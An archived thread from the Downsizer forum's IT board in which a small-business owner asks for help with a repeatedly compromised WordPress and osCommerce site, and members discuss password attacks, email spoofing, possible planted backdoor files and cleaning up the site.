Archive for Downsizer For an ethical approach to consumption
 


       Downsizer Forum Index -> IT Matters
sally_in_wales

I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.

My web host helpdesk are pretty good and have helped me unpick it each time its happened, but no matter how carefully I follow their list of instructions to make sure the password is impossible for me to remember let alone anyone else, and to make sure things like wp are updated regularly, that my home computer is clear of spy stuff and things like that, it seems to happen every few weeks at the moment, and they've just sent me a message saying if it happens again they'll assume its me being negligent and will suspend the site.

I don't know what else to do to tighten it all up further, and because I have virtually no coding ability I can't spot problem areas within the guts of the system, and I need someone who knows what they are looking at to give the site a good going over looking for malicious loopholes or dodgy permissions or whatever else might be making it easy for them to get in and tighten everything up as far as humanly possible, maybe remove completely anything that isn't necessary to the functionality of the site.

I can pay, I have no idea how big a job it will be, but I'm guessing its something like an evenings work to do a proper check, tighten anything obvious, then give me a to-do list of anything I need to watch out for or do from there. The main site is run on WP, the shop is oscommerce and really could do with replacing with something more modern, but until I have time to research a new option, I'm stuck with that.

Is anyone able to bail me out here? I've got nasty cold hard cash available.
Treacodactyl

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.


I don't understand this. Doesn't the company you use lock the account after a few incorrect login attempts, like most other sites?

I would have thought a decent long password of 20 random characters would be fairly secure and could be written down without issue.
Hairyloon

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.

Are you sure that is what is happening?
You don't need to get inside the system to send emails appearing to come from someone else's domain: you can just change the "from" setting in your email programme.
sally_in_wales

I really don't know, I have something on the wp side of things that flags up if someone has been logged out after trying to get in, but I don't know how it works in the wider system. Is it for example, possible to lock down the site so that only my ip address can access the guts of things unless I add an ip address to a whitelist, to allow, for example, anyone helping me web wrangle get in. This is why I need help, I don't know enough about how the various security options work to know if I'm missing out something beyond the most obvious things. I hate not having the skills to do this myself, makes me feel so utterly inept and helpless sally_in_wales

Re: I need an experienced website wrangler

I've had a string of attacks on my website where as best I can tell, they use random wossname generators to get past the passwords, then send pointless spam email from inside the system.
Are you sure that is what is happening?
You don't need to get inside the system to send emails appearing to come from someone else's domain: you can just change the "from" setting in your email programme.

The host site keep sending me messages saying they've forced a password reset because they've got verified spanning coming from inside the account, so I assume they are correct. Its usually the first I know about it as they are always madeupnames@myaccount emails, so its only once in a blue moon that I even see a bounced one coming back via the admin mailserver.
vegplot

Wordpress has had a string of nasty vulnerabilities recently. I don't mind having a look at it the evening to see if there's anything I can do. DM me if you'd like me to take a look. I'll need your login details. Nick

Wordpress has had a string of nasty vulnerabilities recently. I don't mind having a look at it the evening to see if there's anything I can do. DM me if you'd like me to take a look. I'll need your login details.

And mother's maiden name, PIN number, and name of your first pet.
sally_in_wales

thank you! Snowball

Jema is also looking. sally_in_wales

much appreciated. Vegplot has some excellent ideas to help muck out the lingering mess from years of me muddling through, so hopefully all cureable Cool jema

I seriously doubt that this is anything to do with passwords.

Both WP and oscommerce have poor reputations, but if you are updating and have not got a lot of add ons and are still being attacked regularly then I strongly suspect that when the first attack happened a backdoor file was planted on the system allow anyone in, whenever they like.

Someone needs to look for files updated since the site was first created, and go though all the php and other vulnerable extensions looking for a nasty, usually these start off with something that decrypts itself.

This needs to be done from a shell session, does your provider allow you login access to a command line?
sally_in_wales



This needs to be done from a shell session, does your provider allow you login access to a command line?

err, I don't quite know what that means, but I expect Vegplot will and I'll see if I can find out. The current plan if I've understood it correctly is to move the good bits of the site out for a while so we can scrap everything else (there are bits of files in there left over from the old Geocities days I suspect, I've always been to afraid to delete old versions in case I scrap something important Embarassed ) then put the usable bits back in a tidy way.

I do need to find a new shop option, the oscommerce one has been aging rapidly for ages now, I've tried to look up reviews of different options but they all assume one speaks a certain techie language and I get utterly boggled by the bits about installation requirements before I get to the parts about whether I can get it to do the things I need, like postage based on weight and region rather than the flat rate only that a lot of the online shop options seem to stick with.

I know its pathetic that I can't manage all this tidily in this day and age, everyone else on the planet seems to be able to converse about php and coding stuff without needing to lie down in a darkened room with a nice flint axe for comfort, but I'm failing badly at keeping up here
Nick

Your mistake is probably trying to do it. There are some things one can do, and some one cannot. It's not a bad thing to pay an expert to do something expert. Your website is a crucial tool for the business, and worth getting right. There's no point in feeling bad, or guilty about it. Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile sally_in_wales

that makes me feel a bit better Very Happy earthyvirgo



This needs to be done from a shell session, does your provider allow you login access to a command line?

err, I don't quite know what that means, but I expect Vegplot will and I'll see if I can find out. The current plan if I've understood it correctly is to move the good bits of the site out for a while so we can scrap everything else (there are bits of files in there left over from the old Geocities days I suspect, I've always been to afraid to delete old versions in case I scrap something important Embarassed ) then put the usable bits back in a tidy way.

I do need to find a new shop option, the oscommerce one has been aging rapidly for ages now, I've tried to look up reviews of different options but they all assume one speaks a certain techie language and I get utterly boggled by the bits about installation requirements before I get to the parts about whether I can get it to do the things I need, like postage based on weight and region rather than the flat rate only that a lot of the online shop options seem to stick with.

I know its pathetic that I can't manage all this tidily in this day and age, everyone else on the planet seems to be able to converse about php and coding stuff without needing to lie down in a darkened room with a nice flint axe for comfort, but I'm failing badly at keeping up here

It's not pathetic at all Sally. I'm an ex-web designer, I've started describing my own website as 'vintage' and 'retro', it's so in need of an overhaul.

People still buy from it tho', so it's functional, if not a thing of great beauty.

EV
vegplot

Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile

Mud. It's quite simple.
Nick

Fwiw, vegplot and jema are probably awful at medieval cosmetic formulation. Smile

Mud. It's quite simple.

I stand corrected. Fix your own website.
       Downsizer Forum Index -> IT Matters
Page 1 of 1
Home Home Home Home Home